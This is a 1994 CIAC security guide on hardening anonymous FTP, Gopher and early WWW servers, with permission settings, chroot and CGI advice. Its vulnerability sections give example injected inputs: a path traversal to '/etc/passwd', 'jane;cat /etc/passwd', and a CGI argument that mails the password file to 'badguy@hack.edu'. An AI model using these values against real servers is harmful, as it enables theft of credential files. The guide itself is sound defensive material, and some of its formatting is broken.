Securing Internet Information Servers

DISCLAIMER

Reference to any specific commercial product does not necessarily constitute or imply its endorsement, recommendation or favoring by CIAC, the University of California, the United States Department of Energy, or the United States Government.

Work performed under the auspices of the U. S. Department of Energy by Lawrence Livermore National Laboratory under Contract W-7405-Eng-48.

TABLE OF CONTENTS

• Securing Internet Information Servers
  • Introduction
    • Overview
    • Need for Security
  • General Guidelines for Establishing Information Servers
    • Recommendations
• Securing Anonymous FTP Servers
  • Overview
    • Use of FTP Servers
    • FTP Server Vulnerabilities
    • FTP Server Configuration Issues
  • How to Secure an Anonymous FTP Server
    • Procedure
    • Additional Configuration for SunOS
    • Establishing an Incoming File Area
  • Advanced Features
    • Public FTP Servers
• Securing Gopher Servers
  • Overview
    • Advantages and Disadvantages of Gopher Servers
    • Gopher Server Vulnerabilities
  • How to Configure a Gopher Server
    • Using Configuration Options
• Securing World Wide Web Servers
  • Overview
    • Advantages and Disadvantages of World Wide Web Servers
    • WWW Network Protocol
    • WWW Server Vulnerabilities
  • How to Configure a WWW Server
    • General Guidelines
    • Using Configuration Options
• References
• Appendix A: Publicly Available Server Software
  • What's in This Appendix
  • Washington University FTP Daemon
  • Gopher Server Software
  • World Wide Web HTTP Servers
    • NCSA httpd
    • CERN httpd
    • GN/Gopher/HTTP
  • The "chrootuid" Package
  • The Security Profile Inspector
  • Tripwire
• Appendix B: Contacting CIAC

• The bulk of server software in use today, especially for newer services such as Gopher and the WWW, was rapidly developed in a research or university environment and has not undergone rigorous security testing. These programs exhibit significant vulnerabilities that will most likely continue.
• Several of the server packages do not require privileged system access for installation, thus allowing users to establish their own information servers. While desirable, user installation may place systems at risk if users do not establish proper server configuration.
• The growth in both the size of the Internet and the number of information servers has translated into a corresponding expansion in the number of attacks on information servers.
• As organizations and businesses begin to use the Internet to advertise their capabilities and distribute their products, sensitive data will increasingly become vulnerable to compromise and corruption.

• The information server should reside on a system dedicated solely to information distribution, and only information to be distributed should reside on this system. You should assume that any information placed on the system will be available to the Internet public, should your server software be compromised.
• Servers should run with as little privilege as necessary. If at all possible, server software should NOT run as "root," thus limiting possible damage if an intruder discovers a vulnerability.
• Whenever possible, server software should be executed in a restricted file space ('chroot' environment in Unix), thus restricting files to which the server has access and making it more difficult for users to access unintended information.
• System administrators should closely monitor the integrity of the system and the information to be distributed. Cryptographic "checksum" utilities, such as SPI and Tripwire, can create system snapshots and notify administrators of unauthorized modifications. Appendix A contains further information about obtaining these packages.

These servers are often used to distribute software packages and documents. For example, this document is available from the anonymous FTP server "ciac.llnl.gov".

FTP Server Vulnerabilities

• People on the Internet may use writable areas of an FTP file system to exchange files. This is a common technique used by people to trade copyrighted software and pornographic pictures.
• Users may alter or delete information or software.
• In the past, FTP software vulnerabilities have been found that permitted complete access to the system's files. (CIAC Bulletin E-17 discusses some of these.) These vulnerabilities have been corrected; however, the possibility of new vulnerabilities in the software, especially as new features are added, is very real.
• Configuration errors may permit unintended access to sensitive files. For example, a common mistake when setting up an anonymous FTP server is to make a copy of the system password file in the area available to remote users. If any local users have chosen weak passwords, intruders may then use this password file to break into the system.

• No files or directories in the anonymous FTP area should be "owned" by the user "ftp". This is the user ID of anonymous users, and anything owned by it can be modified, replaced, or deleted by any remote user on the Internet.
• No encrypted passwords from the system password file '/etc/passwd' should be present in the password file in the anonymous FTP area '~ftp/etc/passwd'. Anyone on the Internet can retrieve these encrypted passwords, and unauthorized users can make attempts to decrypt them.
• If at all possible, no directories or files should be writable by anonymous users. On some systems, remote users find it helpful to have an "incoming" directory available for depositing files. Frequently, network intruders use these areas to store and exchange illicit files, including copyrighted software and pornographic pictures. If system administrators require this type of directory, they should secure it as much as possible by using the methods described in the following sections.

1. Create the FTP "user".

To create a new "ftp" user and group, you add entries to the system password and group files '/etc/passwd' and '/etc/group', respectively. The following guidelines are important:

• The 'uid' and 'gid' numbers should be previously unused.
• The password entry should specify a locked password (*) and have no login shell '/bin/false'. This prevents unauthorized logins by the FTP user.
• The home directory specified in '/etc/passwd' will become the root of the file system that is available to anonymous users.

Examples of system password file and system group file additions are:

         --------------------------------------------------------
        | System password file:
        | 
        | prompt% cat /etc/passwd
        | :
        | ftp:*:300:300:Anonymous FTP:/home/ftp:/bin/false
        | :
        | 
        | System group file:
        | 
        | prompt% cat /etc/group
        | :
        | ftp::300:
        | :
         --------------------------------------------------------
       

2. Create the anonymous FTP file area.

The FTP home directory '~ftp' and all lower-level information will be available to anonymous users. The following guidelines are important:

• The owner of the directory should be "root" and group should be "ftp".
• The user "ftp" must NOT be the owner of '~ftp'; this configuration prevents anonymous users from adding or removing files.
• The permissions of '~ftp' should be set to 555; this allows read and execute access to all files but disallows writing to files.

The directory set-up looks like this:

         --------------------------------------------------------
        | prompt% ls -lgd ~ftp
        | dr-xr-xr-x  8 root	ftp	512 Jun 21 11:28 ftp
         --------------------------------------------------------
       

3. Create the directory '~ftp/etc'.

The following guidelines are important in creating the '~ftp/etc' directory:

• The owner of the directory should be "root" and group should be "ftp".
• The permissions on the directory should be 111; this allows remote users to access files in the directory but not list their names.

  The directory set-up looks like this:

           --------------------------------------------------------
          | prompt% ls -lgd ~ftp/etc
          | dr--x--x--x  8 root	ftp	512 Jun 21 11:30 etc
           --------------------------------------------------------
  	      

• The '~ftp/etc' directory should contain modified versions of the system password and group files '/etc/passwd' and '/etc/group'. The FTP server uses these files to display user and group names when remote users list directory contents with the "DIR" command.

  Note: These modified files should contain as little information as possible from the original password and group files. In particular, the modified files should never contain the encrypted password field for a user.

  These examples show modified system password and group files:

           --------------------------------------------------------
          | Modified system password file:
          | 
          | prompt% cat ~ftp/etc/passwd
          | root:*:0:1:Super User:/:/bin/false
          | ftp:*:300:300:FTP Administrator:/:/bin/false
          | sources:*:400:400:Source Manager:/:/bin/false
          | 
          | Modified system group file:
          | 
          | prompt% cat ~ftp/etc/group
          | daemon::1:
          | ftp::300:
          | sources::400:
           --------------------------------------------------------
  	      

• The permissions of the modified system password and group files should each be set at 444 and each should be owned by "root".

  The directory set-up looks like this:

           --------------------------------------------------------
          | prompt% ls -lg ~ftp/etc
          | -r--r--r--  8 root	ftp	52 Jun 21 11:28 group
          | -r--r--r--  8 root	ftp	109 Jun 21 13:12 passwd
           --------------------------------------------------------
  	      

4. Create the directory '~ftp/bin'.

The following guidelines are important in creating the '~ftp/bin' directory:

• The owner of the directory should be "root" and group should be "ftp".
• The permissions on the directory should be 111.

The directory set-up looks like this:

         --------------------------------------------------------
        | prompt% ls -lgd ~ftp/bin
        | d--x--x--x  8 root	ftp	512 Jun 21 11:30 bin
         --------------------------------------------------------
       

5. Copy the ls program into '~ftp/bin'.

The following guidelines are important when copying the 'ls' program into '~ftp/bin':

• The owner of the directory should be "root" and group should be "ftp".
• The permissions on the directory should be 111.

The directory set-up looks like this:

         --------------------------------------------------------
        | prompt% ls -lg ~ftp/bin
        | ---x--x--x  8 root	ftp	13352 Jun 20 14:02 ls
         --------------------------------------------------------
       

6. Create a directory '~ftp/pub' for files to be distributed to anonymous users.

The following guidelines are important in creating the '~ftp/pub' directory:

• The owner of the directory and any subdirectories under it should be "root" and group should be "ftp".
• The permissions on the directory should be 555.

The directory set-up looks like this:

         --------------------------------------------------------
        | prompt% ls -lgd ~ftp/pub
        | dr-xr-xr-x  8 root	ftp	512 Jun 21 11:40 pub
         --------------------------------------------------------
       

Follow these steps to install the SunOS libraries:

1. Create the directories '~ftp/usr' and '~ftp/usr/lib'.
   • The owner of the directories should be "root" and group should be "ftp".
   • The permissions on the directories should be 555.
2. Copy '/usr/lib/ld.so' and the latest versions of '/usr/lib/libc.so.X.Y' and '/usr/lib/libdl.so.X.Y' into '~ftp/usr/lib'. ("X" and "Y" are the version numbers of the library.)
   • The owner of these directories should be "root" and group should be "ftp".
   • The permissions on the directories should be 555.
3. Create a '~ftp/dev' directory.
   • The owner of the directory should be "root" and group should be "ftp".
   • The permissions on the directory should be 111.
4. Create the zero device (required by the shared library loader) using the following commands:

            --------------------------------------------------------
           | prompt% cd ~ftp/dev
           | prompt% mknod zero c 3 12
            --------------------------------------------------------
        

• The owner of the directory should be "root" and group should be "ftp".
• The permissions on the directory should be 1733.

A sample incoming directory set-up looks like this:

         --------------------------------------------------------
        | prompt% mkdir ~ftp/incoming
        | prompt% chown root ~ftp/incoming
        | prompt% chgrp ftp ~ftp/incoming
        | prompt% chmod 1733 ~ftp/incoming
        | prompt% ls -lgd ~ftp/incoming
        | drwx-wx-wt  8 root	ftp	512 Jun 21 11:45 incoming
         --------------------------------------------------------

Appendix A provides additional information on the sources and features of public domain FTP servers.

• Gopher servers provide greater flexibility in the types of information that can be distributed. The information returned to remote users can include links to information sources at other Internet sites, gateways to other types of services (such as FTP and Telnet servers), and even dynamic information generated by local software and driven by remote user requests.
• Gopher servers are easier to use than FTP servers. Most client software includes some sort of graphical user interface and it usually knows how to handle different types of files that a user retrieves. For example, a typical program will automatically run a display program when a graphic image is retrieved.

• Under some circumstances, remote users can trick the gopher server into retrieving any file on the system, including sensitive system files such as '/etc/passwd'.

  For example, some older gopher servers would accept requests for the file '../../../../../../../etc/passwd', thus bypassing the server software checks that normally restrict file access to files contained in the gopher directory and instead returning the system password file.

  Remote users could then search for weak passwords and compromise the entire system.

• Remote users can possibly cause the gopher server to execute arbitrary, undesired shell commands. Sometimes, gopher servers are configured to execute programs on the server host; they will then pass user-specified arguments to the program on the command line. On some systems, the configuration of these arguments will cause additional programs to be executed.

  As an example, a gopher server is configured to call the "finger" program with one user-supplied argument, i.e., the name of the account to finger. If the user specified the account 'jane', the gopher daemon would pass the string 'finger jane' to the Unix command interpreter.

  However, if the user supplied the account 'jane;cat /etc/passwd', the server would pass the string 'finger jane;cat /etc/passwd' to the system. Because the semi-colon is used to separate multiple commands on the same line, the system would finger 'jane' AND display the contents of the system password file.

1. Run the most recent version of the gopher server software. Currently, these versions are "gopher 1.13" (Gopher) and "gopher 2.013" (Gopher+). CIAC believes these versions are free from most of the vulnerabilities described in the previous section.

   These gopher versions are available via anonymous FTP server " ftp://boombox.micro.umn.edu/pub/gopher/Unix/".

2. Do not use the '-c' command line option to the gopher daemon ("gopherd") program. Without '-c', the gopher server will perform a 'chroot()' system call when it starts up, thus making the gopher home directory appear to the gopher server to be the root of the file system. This configuration prevents the gopher server from accessing any files outside the gopher home directory.

   Note: If you use the '-c' option, any vulnerability in the gopher software will allow an intruder to access all files on the system.

3. Use the '-u' command line option to the "gopherd" program to specify an alternate user name for runtime.

   Note: If you do not use the '-u' option, the server will run as the superuser, and any intruder able to compromise the server software will have privileged access to the system.

   Use a non-privileged user name, for example:

            --------------------------------------------------------
           | /usr/local/etc/gopherd -u nobody
            --------------------------------------------------------
          

4. Use the '-l' command line option to specify a file for a transaction log. Regular examination of the log will alert you to unusual or suspicious requests for the server. The log will also provide a useful audit trail if you suspect your server has been compromised.

   An example of the '-l' command line option looks like this:

            --------------------------------------------------------
           | /usr/local/etc/gopherd -u nobody -l /usr/adm/gopherlog
            --------------------------------------------------------
          

5. Do not use the same data directories for gopher and anonymous FTP servers if the FTP server allows remote users to upload files.

   Note: Using the same directories for gopher and anonymous FTP servers can allow users to upload executable files with FTP; users can then execute the files via gopher.

• WWW documents allow access via hypertext to thousands of information sources and large amounts of data around the world.
• WWW browsers such as NCSA Mosaic are graphical and easy to use.

• The server may allow access to files located outside the file area designated for WWW access. Intruders may be able to trick some HTTP servers into returning system files such as the password file '/etc/passwd'.
• Most HTTP servers support executable scripts (Common Gateway Interface, or CGI, scripts) that compute information to be sent back to remote users at the time of demand. THIS IS THE AREA OF GREATEST VULNERABILITY FOR AN HTTP SERVER. The system often cues these scripts using input from remote users; this information is generally supplied via a fill-out form. If these scripts are not carefully written, intruders can subvert the scripts to execute arbitrary commands on the server system.

1. Run the server daemon as a nonprivileged user (e.g., user "nobody") rather than as user "root". Most server daemons can be configured this way. Thus, if an intruder discovers a vulnerability in the server, he or she can only access files and executable programs with the privileges of a nonprivileged user.

   For example, with the NCSA HTTP server, the following configuration lines in the 'conf/httpd.conf' configuration instruct the server to run with the access privileges of user "nobody" and group "nogroup":

            --------------------------------------------------------
           | User nobody
           | Group nogroup
            --------------------------------------------------------
          

2. Most current HTTP servers implement a "Server Includes" or "Server Parsed" feature. This feature allows the server to insert the contents of specific files or the results of system commands in HTML documents as they are sent to remote users. The "Server Includes" or "Server Parsed" feature is often used to include standard disclaimers or dynamic information such as modification dates or file sizes.

   Note: To prevent access to sensitive files by intruders via HTML, you can usually turn off the "include files" feature for specific directories.

   For example, the following configuration commands in the configuration file 'conf/access.conf' instruct the NCSA HTTP server to disallow included files in HTML documents found in user home directories under '/home':

            --------------------------------------------------------
           | 
           | AllowOveride None
           | Options Indexes
           | 
            --------------------------------------------------------
          

3. Write server CGI scripts carefully. You must design these scripts to handle user input cautiously. For example, if a server CGI script instructed the server to execute the command 'searchindex' with only one user-supplied command line option, e.g., '$ARG', the server would likely issue the shell command:

            --------------------------------------------------------
           | searchindex $ARG
            --------------------------------------------------------
          

   If '$ARG' is set to 'computers;mail badguy@hack.edu ', the line sent to the shell would actually look like this:

            --------------------------------------------------------
           | searchindex computers;mail badguy@hack.edu 
   
     Two commands would be executed:
   
          
   
   	 
   	 
    As expected, the searchindex command would search for
   the keyword "computers".
   
   	 
    In the Unix shell, the ";" character is used to separate
   commands. Thus, the server would then mail the system password file to
   "badguy@hack.edu".
   
          
          
           Note: To prevent CGI script compromise, avoid passing remote
                 user input directly to command interpreters such as Unix
                 shells, other interpreters such as Perl and AWK, or
                 programs that allow commands to be embedded in outgoing
                 messages, such as '/usr/ucb/mail'. 
   
          
   
   
                 If user input must pass to these types of programs,
                 filter the input for potentially dangerous characters
                 before it is passed along. These characters include
                 the period (.), comma (,), slash (/), semi-colon (;),
                 tilde (~), and exclamation point (!).
   
     
    Consider running HTTP servers in a restricted portion of the Unix file
   system. Most Unix operating systems provide a 'chroot()' system call that
   causes a program to view the specified directory as the root of the file
   system. 
   
          
   
   
          Here is an example of such a system call:
          
            --------------------------------------------------------
           | chroot (/usr/local/httpd)
            --------------------------------------------------------
          
   
      This call would make the directory '/usr/local/httpd' appear as '/' to
   the program. An intruder to this restricted file system would only have
   access to files below this directory, thus significantly reducing potential
   damage to the system.
   
          
   
   
      To execute network daemons such as HTTP servers in this type of
   restricted environment, you can use a public domain package called
   'chrootuid'. The package is available via anonymous FTP from the address
   "ftp://ftp.win.tue.nl/pub/security".
   

References on Internet Security

1. DFN-CERT (1994). DSB-94:02 New Security Hold in gopherd and gopher. Available via anonymous FTP from "ftp.informatik.uni-hamburg.de" in the directory '/pub/security'.
2. Klaus, Christopher (1994). How to Set Up a Secure Anonymous FTP Site. Available via anonymous FTP from "rtfm.mit.edu" in the file '/pub/usenet-by-group/comp.security.unix/computer-security_anonymous-ftp_FAQ'.
3. Lindner, Paul (1994). Guide to Safe Gophering. Presented at GopherCON 94. Available via Gopher at "boombox.micro.umn.edu".
4. NCSA (1994). NCSA httpd. Available at "http://hoohoo.ncsa.uiuc.edu/docs/Overview.html".
5. U.S. Department of Energy, Computer Incident Advisory Capability (CIAC) (1994). E-14 wuarchive ftpd Trojan Horse. Available via anonymous FTP from "ciac.llnl.gov" in the directory '/pub/ciac/bulletin'.

Supported features include:

• logging of transfers
• logging of commands
• on-the-fly compression and archiving of files and directories
• classification of users by type and location
• logon limits for each class of user
• per directory upload permissions
• directory and system messages

NCSA httpd

This server is available for Unix systems. NCSA httpd features include:

• server scripts to support forms, indexes, and image maps
• per directory access control based on user names and passwords or the host of the remote user
• server side "include" files for dynamic changes to WWW pages

This server is available via anonymous FTP from "ftp.ncsa.uiuc.edu" in the directory '/Web/httpd'.

CERN httpd

The CERN server provides a feature set very similar to the NCSA daemon. In addition, it can be used as a WWW gateway for systems that are behind firewalls.

This server is available for Unix and VMS systems via anonymous FTP from "ftp.w3.org".

GN Gopher/HTTP

The GN Gopher/HTTP server supports both Gopher and WWW clients simultaneously. The GN server provides access control on a per-document rather than per-directory basis, resulting in potentially tighter control over the distributed information.

For more information, see the WWW page "http://hopf.math.nwu.edu/".

The software is available via anonymous FTP from "coast.cs.purdue.edu" in the directory '/pub/tools/unix/chrootuid'.

The Security Profile Inspector

For further information, call the SPI project lead at (510) 422-3881.

Tripwire

Tripwire is available via anonymous FTP from "coast.cs.purdue.edu" in the directory '/pub/tools/unix/Tripwire'.

Phone                (510) 422-8193

Fax                  (510) 423-8002

STU-III              (510) 423-2604

Electronic mail       ciac@llnl.gov

Emergency SKYPAGE     800-SKYPAGE pin# 855-0070

Anonymous FTP server  ciac.llnl.gov (IP 128.115.19.53)

BBS                   (510) 423-3331 (9600 Baud)
                      (510) 423-4753 (2400 Baud)

READER COMMENTS

List errors you find here. Please include page numbers.


________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________

List suggestions for improvement here.

________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________

Optional:

Name _____________________________________________  Phone ______________
Securing Internet Information Servers CIAC-2308 R.2       December, 1994